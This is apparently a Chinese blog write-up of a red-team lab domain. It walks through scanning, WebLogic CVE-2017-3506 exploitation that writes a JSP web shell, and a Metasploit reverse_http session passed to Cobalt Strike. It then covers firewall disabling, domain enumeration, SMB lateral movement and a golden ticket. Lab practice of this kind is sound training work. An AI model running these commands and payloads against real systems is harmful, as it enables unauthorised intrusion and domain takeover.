目录
一、前期准备
DC机配置
PC机配置
WEB机配置
将PC机和WEB机的IP地址进行更改
开启WEB服务
二、外网探测
1.使用nmap扫描
2.目录扫描
3.漏洞扫描
(1)CVE-2017-3506(getshell失败)
(2)CVE-2017-2725(msf)
三、内网渗透
1.信息收集
(1)关闭防火墙
(2)查看域信息
(3)查看域内IP
(4)定位域控及域管理员
(5)查看域内主机
2.权限提升
3.横向移动
4.权限维持
四、总结
一、前期准备
首先下好三个虚拟机
然后配置一下网络,先添加一个VMnet2
然后给每个虚拟机配置一下网卡
DC机配置
账号:administrator
密码:1qaz@WSX
PC机配置
需要配置两张网卡,分别是NAT模式和内网域环境的仅主机模式
账号:mssql
密码:1qaz@WSX
WEB机配置
同样也是配置两张网卡
账号:Administrator/de1ay(在前期配置过程中可以用DE1AY/Administrator进行登录)
密码:1qaz@WSX
将PC机和WEB机的IP地址进行更改
由于我们的VMnet8(NAT)是192.168.57.x 网段的,而这两个机器的默认IP地址为192.168.111.x
所以这里将这两台机器的IP地址改一下:
两者进行IPV4的更改时,都需要输入管理员账号密码
账号:administrator
密码:1qaz@WSX
现在,几台机器的配置如下:
kali:192.168.57.128
PC:192.168.57.201 10.10.10.201
WEB:192.168.57.80 10.10.10.80
DC:10.10.10.10
开启WEB服务
进入WEB机中
分别以管理员身份进行运行上面三个程序
二、外网探测
1.使用nmap扫描
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ce:f6:bc, IPv4: 192.168.57.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.57.1 00:50:56:c0:00:08 VMware, Inc.
192.168.57.2 00:50:56:ea:ad:e3 VMware, Inc.
192.168.57.80 00:0c:29:d6:09:a8 VMware, Inc.
192.168.57.201 00:0c:29:96:f1:a1 VMware, Inc.
192.168.57.254 00:50:56:e3:9e:a6 VMware, Inc.
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.57.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 19:57 CST
Nmap scan report for 192.168.57.80
Host is up (0.00046s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp open ms-wbt-server Microsoft Terminal Service
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49183/tcp open msrpc Microsoft Windows RPC
49190/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
发现80端口和7001端口都是http服务,尝试访问一下,发现80端口没什么反应,反倒是7001端口有信息:显示有Weblogic Server 10.3.6.0
2.目录扫描
扫描一下该端口的目录,看看会不会有别的接口信息,使用dirmap进行扫描
成功显示页面
这个时候可以看到一些信息了:Weblogic是Oracle的JAVA应用服务器,所以这里应该是Weblogic服务。尝试在百度上搜索其相关的漏洞利用工具
我更喜欢用类似WPScan那样的专门的扫描工具,发现了WeblogicScan,尝试用该工具进行扫描,在扫描的同时也可以去尝试会不会有默认账号密码
不过貌似还是密码被改掉了吗,再看看WeblogicScan的扫描结果
3.漏洞扫描
发现还是扫描到了两个漏洞的,问了下关于这两个漏洞的介绍,发现都是远程执行漏洞,那就一个个复现试试。(后续漏洞的原理肯定会再了解的,听说Weblogic的漏洞很多,很有学习的必要,到时候应该会一个个搭建复现一下,这里就直接利用了)
(1)CVE-2017-3506(getshell失败)
以下漏洞复现过程主要是采取这位师傅的文章:
weblogic wls-wsat组件gesilaVE-2017-3506)-CSDN博客
访问/wls-wsat/CoordinatorPortType11目录
如果出现这个页面的话,说明漏洞很可能存在,现在下载工具
工具地址:https://github.com/Al1ex/CVE-2017-3506
写入木马文件:
┌──(root㉿kali)-[~/POC/Weblogic/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.57.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp
[+] Success
[+] http://192.168.57.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami
发现命令执行成功!但后面再尝试使用蚁剑连接时发现返回数据为空:
(2)CVE-2017-2725(msf)
搜索相关漏洞
配置攻击载荷
开始攻击
执行成功!
先让msf和cs联动一下,我更喜欢使用cs来进行操作
首先在cs上开启监听器
然后在msf上设置shell转发
msf6 exploit(windows/local/payload_inject) > use exploit/windows/local/payload_inject
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.57.128
lhost => 192.168.57.128
msf6 exploit(windows/local/payload_inject) > set lport 80
lport => 80
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run
成功上线!
三、内网渗透
1.信息收集
(1)关闭防火墙
netsh advfirewall set allprofiles state off
(2)查看域信息
得到域名信息: de1ay.com
而且可以得知该域应该是存在两个网段的,一个是 192.168.57.x 一个是10.10.10.x
(3)查看域内IP
arp -a
发现以下有用的IP地址:
192.168.57.201
10.10.10.10 (内网)
10.10.10.201 (内网)
(4)定位域控及域管理员
首先查看域控的主机名
beacon > shell net group "domain controllers" /domain
得到域控的主机名为DC,然后ping一下主机名来定位域控
发现域控是 10.10.10.10
还可以查看一下域管理员的名字:
beacon> net group "domain admins" /domain
(5)查看域内主机
上面得到的IP还有一个是 10.10.10.201 不妨看一下其对应的主机名是什么
beacon> shell net group "domain computers" /domain
得到域内信息:
PC :10.10.10.201
DC:10.10.10.10 Adminstrator
2.权限提升
将WEB机的权限提升到SYSTEM,直接尝试权限提升就行
3.横向移动
通过提权的SYSTEM对10.10.10.x/24这个网段进行扫描(内网主机存活+端口扫描)
PC机:
DC机:
可以看到PC机和DC机都开了3389端口,尝试远程桌面登录(但都没有成功)
发现三台机子都开了445端口,在抓取了哈希之后尝试横向移动,先建立一个SMB监听
然后尝试横向移动到DC域控主机上
横向成功!
4.权限维持
创建黄金票据
其中的Domian SID可以这样获得:
这样就成功实现权限维持了!
四、总结
相较于第一次打红日靶场来说,感觉已经熟练了不少,之前的知识补充还是很有用的,虽然也许还存在一些问题,但慢慢来会让自己好受不少。写的部分还是有一些欠佳,而且今天在看之前写的文章的时候竟然发现有几篇文章被系统设为 V I P 可见了,真真是对不起给予我帮助的师傅们。
有问题的地方,还请各位斧正,希望能给我一些宝贵的意见!